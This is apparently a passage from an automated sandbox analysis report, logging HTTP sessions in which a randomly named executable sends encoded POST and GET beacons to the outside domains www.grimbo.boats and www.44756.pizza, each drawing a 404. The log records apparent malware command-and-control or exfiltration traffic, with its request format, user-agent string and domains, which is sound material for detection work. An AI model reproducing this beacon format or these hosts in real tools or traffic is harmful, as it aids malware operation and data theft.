                                              Data Raw: 70 74 48 38 41 36 3d 54 41 64 49 41 50 49 65 4a 46 78 68 37 77 52 31 79 41 63 50 75 4a 6e 52 62 4b 78 77 39 7a 76 47 34 4a 48 33 37 70 54 46 45 38 44 57 76 50 2f 48 34 6f 72 75 47 59 46 51 52 56 6c 6a 4f 62 71 74 74 70 47 6d 31 79 6a 33 58 42 70 4b 52 2f 30 4f 65 51 30 38 74 78 42 31 4d 73 49 30 6d 6a 35 42 47 77 63 59 73 61 7a 66 32 7a 61 75 48 6c 49 6c 39 39 58 53 36 66 73 72 53 6b 51 73 30 75 45 63 67 58 36 30 5a 4b 47 56 75 4d 73 77 64 7a 6d 58 36 57 6e 53 4f 77 35 4a 65 6f 32 37 7a 58 6d 72 34 76 31 4c 49 42 30 58 71 43 50 53 76 39 62 38 69 6a 30 49 65 52 50 52 39 6b 48 50 55 39 4c 6f 38 35 4f 56 36 49 44 36 79 35 59 38 67 59 66 33 42 77 3d 3d
                                              Data Ascii: ptH8A6=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4v1LIB0XqCPSv9b8ij0IeRPR9kHPU9Lo85OV6ID6y5Y8gYf3Bw==
                                              Jan 13, 2025 15:12:29.500003099 CET1090INHTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:29 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRmZ9nQhzZ1ed1fDgmXGma8fB955uWuMTV8O1iz8AqD2aGDGSMd9dvFv%2BK29jSV8Zx%2BJYsY4Df0V%2FXyim2dUT2l11S%2BCFzCwQn0Q5XRMz8uMGny9xBlGyjN0zGAdNHwofnJi"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 9015fb42dde8de94-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.749977104.21.18.17180524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:31.365685940 CET771OUTPOST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 33 57 73 76 50 48 71 63 66 75 44 59 46 51 4a 46 6c 6d 52 4c 71 69 74 70 4b 75 31 32 72 33 58 42 39 4b 52 36 49 4f 64 6a 4d 2f 73 68 42 33 4e 63 49 32 6c 54 35 42 47 77 63 59 73 61 6d 34 32 7a 69 75 48 57 51 6c 38 59 6a 56 7a 2f 73 6b 56 6b 51 73 2b 4f 45 51 67 58 37 54 5a 4c 71 2f 75 4a 77 77 64 7a 57 58 36 6e 6e 64 41 77 34 43 51 49 33 6b 6c 58 58 33 78 61 64 54 50 51 45 71 6f 41 72 74 75 4c 61 65 34 42 34 6b 41 41 33 71 35 6d 6a 35 44 62 57 64 2b 34 4b 4e 33 71 33 62 74 4f 39 57 74 4b 2b 7a 58 42 6d 66 5a 37 35 39 63 43 37 42 50 79 6d 42 68 34 42 33 31 6c 4d 3d
                                              Data Ascii: ptH8A6=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAA3q5mj5DbWd+4KN3q3btO9WtK+zXBmfZ759cC7BPymBh4B31lM=
                                              Jan 13, 2025 15:12:32.012839079 CET1091INHTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:31 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAi78G7bk18YaOPZQcAA5oxz2RaU3O%2BtaYxPTSCc2V%2BAbngqXXTQtTAS%2FuMJtCNFF6U3pfEqHgU7WyvxgthiSmh8ugeXSgldG53n55%2BM6uI2WvZAnrr4JBRpn1SBkGtI4mnI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 9015fb527da98c1b-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.749978104.21.18.17180524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:33.913347960 CET1784OUTPOST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 50 57 76 65 76 48 34 4c 44 75 45 59 46 51 58 56 6c 6e 52 4c 71 46 74 71 36 71 31 32 76 6e 58 43 46 4b 65 2f 45 4f 57 79 4d 2f 6c 68 42 33 47 38 49 31 6d 6a 34 4a 47 77 4d 63 73 61 32 34 32 7a 69 75 48 51 38 6c 37 4e 58 56 31 2f 73 72 53 6b 51 67 30 75 45 38 67 58 79 73 5a 4c 66 4b 75 64 38 77 64 54 47 58 70 46 2f 64 4d 77 34 41 54 49 33 73 6c 58 62 65 78 63 35 31 50 51 41 4d 6f 41 54 74 69 4e 4b 48 76 43 67 34 61 51 72 49 39 41 7a 59 56 34 43 76 2b 4c 71 50 2b 39 54 4f 6e 39 39 4a 6a 38 57 77 63 46 6a 74 4f 35 46 35 45 41 50 56 45 6c 48 4c 77 71 42 70 33 42 72 4d 39 54 57 73 53 6f 68 4b 66 59 35 59 4c 72 35 2f 59 71 64 48 41 48 63 6f 75 52 61 53 75 79 31 6e 39 37 50 68 74 63 61 56 71 6b 6d 66 35 4e 63 32 72 6f 6d 56 6a 2b 39 44 33 31 76 35 37 53 51 41 32 53 4e 48 37 4a 61 31 70 63 5a 5a 6c 68 30 71 62 61 42 62 37 71 77 52 61 38 53 4f 78 31 50 75 34 32 63 [TRUNCATED]
                                              Data Ascii: ptH8A6=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoATtiNKHvCg4aQrI9AzYV4Cv+LqP+9TOn99Jj8WwcFjtO5F5EAPVElHLwqBp3BrM9TWsSohKfY5YLr5/YqdHAHcouRaSuy1n97PhtcaVqkmf5Nc2romVj+9D31v57SQA2SNH7Ja1pcZZlh0qbaBb7qwRa8SOx1Pu42ckQmKJCk6h3ycOIzLePq1kYUmhhKbuy4x9/9Zv6XPIdh3ZNiF531MKhg1mY6Q1k7w8mix63CJj0ZTCRGlPZLdJU4JnXXLmQenH+Ws27p6nseEYe+/tVTldM+TnzFKtB2CW4rUy37ZiThnNr5MftE/swysbmNnMJzHuNFjn4Qfxl200httiMmuZxsYj8DAv071O7zJoRsBFvEgNp8odCkZq64FbvJoEC5/jcSnJR+IiQ0PUVdBWTogvl3jRTrO5VhO+DlEt4P4JxHrzFdqo7gjGS480CE0xORc606Km4qtfKs4gbOFFP4J7dgwlxmqPN032YN/A/FG5+ocjbc/Rd7EEjM876+Ok+IfWkR091wAbEAq0gtp/TIzkWpJGUvsOBnX0kAA0Ryy2nlGpjxM4BhALEfw4WZmBTRx2V0Cimt37YvqT3s7a2pQj50e1s3/Ac+ht0Jjp1MX2eNbLEgaWhOqLIGfBDNvK0FlQndPM62OFgHkiUPVOdPTX0deNAo494RBrDp7ol8/gVrzYoDc4qTfBIXYhxAjMLLl6Me1/mGEUeOMEgXsmH0rCLDaVmc6z32Duh/iPh3rJ2qp4p3hUQkhVxtDi1f/4LRk2zJCXCSGq4MfNNmngJq05+QR5Dc0+dvg8XxnrFSfoQKvQ/JDksvswcQcb8jBH9lgnB [TRUNCATED]
                                              Jan 13, 2025 15:12:34.546976089 CET1093INHTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:34 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J9omE8MKObYe0UkPT6VTD%2FnAekwE6cI6KRXFcae1zDIlIuGFT1xyLyp%2FLzVWfp8AqGU%2BAw3jLfHzaPIybSK77YNaAK7SsQhZOuGy91nXB%2BZ0T%2BYlxNUdFe8rSoLNqI0lN3PW"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 9015fb625ce6c34b-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1784&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.749979104.21.18.17180524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:36.454006910 CET491OUTGET /kxtt/?ptH8A6=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvRsCKtwsoTwtBRtOzLnbykrUVFpky7P5wYQuQ25a4dovtn3QHJaU3t1x&e4M=Tfa0_jE0 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.grimbo.boats
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:12:37.125741005 CET1101INHTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:37 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFktooRRtvOcfQxB8uMLEh8VT76xYSTAp0QHLyCuWOwB4GyirGnqQ%2BnsU53Ecbi286VCE9sAcmTkSHB6pqL%2F0%2FBF%2B8hmbYV4eabsaix5zCfY1IADLu6aIrPjdwosMRv1bY7E"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 9015fb727efec333-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1497&rtt_var=748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.749980134.122.135.4880524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:43.022403002 CET748OUTPOST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 68 70 70 78 36 37 6c 37 6a 35 66 67 30 63 62 6f 45 6f 4e 4e 6a 62 77 67 67 56 4f 4f 49 69 78 41 49 32 34 5a 34 51 62 4b 68 77 67 45 56 6d 50 44 7a 4a 4d 63 38 65 37 2f 46 6e 58 4b 4d 30 70 35 4c 45 70 68 36 36 51 70 76 75 75 61 69 62 75 61 46 56 70 56 48 72 76 52 47 45 57 42 62 31 78 6e 64 52 58 64 6a 64 45 78 67 4e 70 6d 74 6f 39 4b 2b 63 41 73 42 47 50 47 47 5a 6f 31 47 71 50 4f 4b 4c 56 68 39 62 35 55 45 61 56 5a 4a 6b 4f 4e 73 33 56 70 44 6b 42 32 38 56 71 52 35 64 65 69 53 4a 75 2f 4e 76 6d 37 5a 50 64 6d 6d 4a 65 6d 56 79 61 5a 2b 36 48 70 55 43 58 43 78 41 7a 52 6c 71 6f 63 51 3d 3d
                                              Data Ascii: ptH8A6=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpDkB28VqR5deiSJu/Nvm7ZPdmmJemVyaZ+6HpUCXCxAzRlqocQ==
                                              Jan 13, 2025 15:12:43.965837002 CET312INHTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Mon, 13 Jan 2025 14:12:43 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.749981134.122.135.4880524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:45.567640066 CET768OUTPOST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 37 57 78 44 6f 47 34 59 35 51 62 5a 52 77 67 4d 31 6d 47 65 6a 4a 54 63 38 53 56 2f 45 62 58 4b 4d 67 70 35 4c 30 70 68 4a 43 54 70 2f 75 67 42 79 62 6f 51 6c 56 70 56 48 72 76 52 48 68 37 42 59 46 78 6e 4a 56 58 63 42 35 48 79 67 4d 62 75 4e 6f 39 63 4f 63 63 73 42 47 68 47 48 31 47 31 46 53 50 4f 4c 37 56 68 76 7a 36 64 45 61 58 55 70 6c 4a 46 4d 75 4a 68 6d 51 2f 7a 71 6c 66 58 37 56 64 6e 6b 49 4d 6c 76 6a 4b 6c 49 33 6d 69 6b 74 6f 78 7a 76 76 62 2f 2b 66 6b 32 32 32 64 47 6c 5a 63 33 4c 73 4b 6a 66 63 6c 5a 55 66 38 31 6f 2b 79 32 34 45 65 5a 33 41 79 6f 67 3d
                                              Data Ascii: ptH8A6=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlI3miktoxzvvb/+fk222dGlZc3LsKjfclZUf81o+y24EeZ3Ayog=
                                              Jan 13, 2025 15:12:46.485959053 CET312INHTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Mon, 13 Jan 2025 14:12:46 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.749982134.122.135.4880524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:48.131705999 CET1781OUTPOST /a59t/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.44756.pizza
                                              Origin: http://www.44756.pizza
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.44756.pizza/a59t/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
